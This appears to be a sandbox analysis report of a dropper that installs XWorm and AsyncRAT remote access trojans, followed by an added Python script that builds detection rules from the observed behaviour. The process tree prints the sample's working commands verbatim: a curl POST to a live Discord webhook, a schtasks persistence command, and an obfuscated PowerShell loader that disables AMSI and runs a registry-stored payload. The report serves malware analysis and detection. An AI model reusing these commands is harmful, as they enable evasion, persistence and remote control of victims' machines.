Analysis

  • max time kernel
    5s
  • max time network
    7s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-06-2024 05:28

Errors

Reason
Machine shutdown

General

  • Target

    Dropper.exe

  • Size

    1.4MB

  • MD5

    afbd173e05ef8ddabbe10b90f93b6614

  • SHA1

    718220c153e1eba3d978eb7d2eb884716797be9f

  • SHA256

    9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e

  • SHA512

    5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f

  • SSDEEP

    12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
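
The signatures above are the sandbox's own labels; the behaviours they summarise are visible verbatim in the process tree of this report: a curl POST to a Discord webhook with spoofed discohook.org headers (the "Legitimate hosting services abused" hit), `schtasks /create ... /sc onlogon /rl highest` pointing at %AppData%\Roaming (the "Scheduled Task" hit), and every dropped binary carrying a `$77-` name prefix. The following is an added example, not part of the sandbox report, showing how those observations translate into process-creation triage rules. The records are constructed Sysmon-style events modelled on this tree (the webhook token is replaced with a placeholder, parent PIDs not in the tree are deliberately absent, and the last record is a benign control that must not fire). The `$77` rule rests on a fact the report itself does not state: `$77` is the default file/process hide prefix of the open-source r77 rootkit.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records modelled on the process
# tree in this report. The webhook token is a placeholder, ppids 900/1488/4028
# are intentionally not in the list, and the last record is a benign control.
EVENTS = [
    {"pid": 2144, "ppid": 900,
     "image": r"C:\Users\Admin\AppData\Local\Temp\Dropper.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"'},
    {"pid": 540, "ppid": 1488,
     "image": r"C:\Windows\SysWOW64\curl.exe",
     "cmdline": 'curl "https://discord.com/api/webhooks/1253936460533596222/PLACEHOLDER" '
                '-X POST -H "Referer: https://discohook.org/" -H "Origin: https://discohook.org" '
                '--data-raw "{""content"":""`Admin` Ran The File!""}"'},
    {"pid": 4984, "ppid": 2144,
     "image": r"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"'},
    {"pid": 4196, "ppid": 4028,
     "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r"""schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" """
                r"""/tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'"""},
    {"pid": 7777, "ppid": 900,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Adobe Update" /tr "C:\Program Files\Adobe\update.exe"'},
]

WEBHOOK = re.compile(r"https?://discord(?:app)?\.com/api/webhooks/(\d+)/", re.I)
TASK_RUN = re.compile(r"/tr\s+['\"]*([^'\"]+)", re.I)
# Directories a standard user can write to: the drop (%Temp%) and persistence
# (%AppData%) locations used by this sample.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def in_user_writable(path: str) -> bool:
    return any(d in path.lower() for d in USER_WRITABLE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name


def triage(events):
    """Return (pid, rule, detail) hits for the behaviours seen in this report."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = basename(e["image"])
        cmd = e["cmdline"]
        low = cmd.lower()

        # Run notification / exfil through a Discord webhook, from any process.
        m = WEBHOOK.search(cmd)
        if m:
            hits.append((e["pid"], "discord_webhook_beacon", f"webhook id {m.group(1)} via {img}"))

        # schtasks persistence at highest run level whose action lives in a
        # user-writable directory (the onlogon task created for $77-aachost.exe).
        target = ""
        if img.lower() == "schtasks.exe" and "/create" in low:
            tr = TASK_RUN.search(cmd)
            target = tr.group(1).strip() if tr else ""
            if "/rl highest" in low and in_user_writable(target):
                hits.append((e["pid"], "schtasks_highest_userwritable", target))

        # "$77" is the default hide prefix of the open-source r77 rootkit
        # (assumption about intent; the report only shows the naming).
        for name in (img, basename(target) if target else ""):
            if name.startswith("$77"):
                hits.append((e["pid"], "hidden_prefix_77", name))
                break

        # "Executes dropped EXE": a binary in a user-writable directory started
        # by a parent that itself runs from a user-writable directory.
        parent = by_pid.get(e["ppid"])
        if parent and in_user_writable(e["image"]) and in_user_writable(parent["image"]):
            hits.append((e["pid"], "dropped_exe_from_userdir",
                         f"{basename(parent['image'])} -> {img}"))
    return hits


if __name__ == "__main__":
    for pid, rule, detail in triage(EVENTS):
        print(f"{pid:>5}  {rule:<30} {detail}")
```

The webhook rule deliberately matches on the URL rather than on curl.exe, because the same POST is also present on the parent cmd.exe command line and would equally appear in a PowerShell `Invoke-RestMethod` call; the schtasks rule keys on `/rl highest` plus a user-writable action path, which is what separates this task from the vendor updater in the control record.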

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1488
      • C:\Windows\SysWOW64\curl.exe
        curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
          PID:540
      • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3320
      • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4028
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4196
      • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:756
      • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
        2⤵
        • Executes dropped EXE
        PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cGMeUGbQwrUv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XodSWkjyDnBiia,[Parameter(Position=1)][Type]$PAOuipoSxq)$aTHgdegoXPd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+'ect'+[Char](101)+'dD'+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'Sea'+'l'+''+'e'+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+'l'+'a'+'s'+'s',[MulticastDelegate]);$aTHgdegoXPd.DefineConstructor('RTS'+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XodSWkjyDnBiia).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+'i'+''+[Char](109)+'e'+','+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+[Char](100)+'');$aTHgdegoXPd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+
[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$PAOuipoSxq,$XodSWkjyDnBiia).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $aTHgdegoXPd.CreateType();}$yyojQTtxCfSnI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n'+'3'+''+'2'+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+'s'+'');$mrTAGOxMImyDmj=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+'et'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JaCeBBsAfsErqPBefOq=cGMeUGbQwrUv @([String])([IntPtr]);$UiEkmYxvdURwPmuJIbXHnK=cGMeUGbQwrUv 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eMjwxkfWWoA=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$linFdlzdfFGtts=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+'ryA')));$MLgpJhmpOvyryFfje=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object]('V'+[Char](105)+'r'+'t'+''+[Char](117)+'al'+'P'+'r'+[Char](111)+'te'+'c'+'t')));$SzYSnFW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($linFdlzdfFGtts,$JaCeBBsAfsErqPBefOq).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$igBeVBuvnHTmziqrM=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$SzYSnFW,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'f'+'e'+'r')));$COqrNkTiDi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,4,[ref]$COqrNkTiDi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$igBeVBuvnHTmziqrM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,0x20,[ref]$COqrNkTiDi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4528

    Network

    No network events are listed for this run. The analysis ended with a "Machine shutdown" error (see Errors) after 5s of kernel time, so the absence of traffic to the extracted xworm and asyncrat C2 endpoints (politics-fiber.gl.at.ply.gg:47430 and environmental-blank.gl.at.ply.gg:25944) is not evidence that the implants failed to beacon. The only outbound activity visible in this report is the Discord webhook POST issued through curl, and it is visible only as a process command line.

    MITRE ATT&CK Matrix (ATT&CK v13)

    • Execution: Scheduled Task/Job (T1053) 1; Scheduled Task (T1053.005) 1
    • Persistence: Scheduled Task/Job (T1053) 1; Scheduled Task (T1053.005) 1
    • Privilege Escalation: Scheduled Task/Job (T1053) 1; Scheduled Task (T1053.005) 1
    • Discovery: Query Registry (T1012) 1; System Information Discovery (T1082) 2
    • Command and Control: Web Service (T1102) 1


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      Filesize

      66KB

      MD5

      499861c56b2368cb123c027336370b92

      SHA1

      c018376876cc5906681502bdc4c313e9ce4bd6ad

      SHA256

      146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930

      SHA512

      c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077

    • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
      Filesize

      163KB

      MD5

      1a7d1b5d24ba30c4d3d5502295ab5e89

      SHA1

      2d5e69cf335605ba0a61f0bbecbea6fc06a42563

      SHA256

      b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

      SHA512

      859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      Filesize

      256KB

      MD5

      18f497deffe88b6b2cff336a277aface

      SHA1

      4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

      SHA256

      8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

      SHA512

      35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

    • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      Filesize

      50KB

      MD5

      77a71f3a441aa3bf824967e52413bec5

      SHA1

      c3d6df5cfc5eefaadf9bcb3703484e3cadf79588

      SHA256

      1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82

      SHA512

      31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

    • C:\Windows\Temp\__PSScriptPolicyTest_g3hgnhhh.oug.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/756-188-0x0000000000F50000-0x0000000000F96000-memory.dmp
      Filesize

      280KB

    • memory/756-216-0x0000000002EF0000-0x0000000002EF6000-memory.dmp
      Filesize

      24KB

    • memory/2144-1-0x0000000000480000-0x00000000005F0000-memory.dmp
      Filesize

      1.4MB

    • memory/2144-0-0x00000000744DE000-0x00000000744DF000-memory.dmp
      Filesize

      4KB

    • memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmp
      Filesize

      72KB

    • memory/3320-64-0x00007FFFFA653000-0x00007FFFFA655000-memory.dmp
      Filesize

      8KB

    • memory/4528-222-0x000001F4B48E0000-0x000001F4B4902000-memory.dmp
      Filesize

      136KB

    • memory/4528-231-0x000001F4B4C80000-0x000001F4B4CAA000-memory.dmp
      Filesize

      168KB

    • memory/4528-232-0x00007FF8195D0000-0x00007FF8197C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4528-233-0x00007FF819190000-0x00007FF81924E000-memory.dmp
      Filesize

      760KB

    • memory/4528-234-0x00007FF643530000-0x00007FF6435A1000-memory.dmp
      Filesize

      452KB

    • memory/4984-127-0x0000000000600000-0x0000000000616000-memory.dmp
      Filesize

      88KB